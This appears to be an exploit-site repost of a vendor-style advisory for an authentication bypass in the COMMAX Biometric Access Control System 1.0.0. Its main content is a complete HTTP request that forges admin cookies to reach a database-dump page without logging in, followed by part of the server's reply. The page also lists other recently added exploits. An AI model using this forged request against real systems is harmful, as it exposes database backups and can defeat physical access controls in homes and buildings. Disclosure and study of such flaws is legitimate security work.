Commax biometric access control system 1.0.0 authentication bypass Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-08-16 | Type : webapps | Platform : hardware
This exploit / vulnerability Commax biometric access control system 1.0.0 authentication bypass is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com

COMMAX Biometric Access Control System 1.0.0 Authentication Bypass


Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: 1.0.0

Summary: Biometric access control system.

Desc: The application suffers from an authentication bypass vulnerability.
An unauthenticated attacker through cookie poisoning can bypass authentication
and disclose sensitive information and circumvent physical controls in smart
homes and buildings.

Tested on: nginx/1.14.0 (Ubuntu)
MariaDB/10.3.15


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2021-5661
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php


02.08.2021

--


The following request with Cookie forging bypasses authentication and lists available SQL backups.

GET /db_dump.php HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.1/user_add.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0
Connection: close


HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 03 Aug 1984 14:07:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 10316


<!DOCTYPE html>
<html class="no-js" lang="ko">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>::: COMMAX :::</title>
...
...

Commax biometric access control system 1.0.0 authentication bypass


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Commax biometric access control system 1.0.0 authentication bypass Vulnerability / Exploit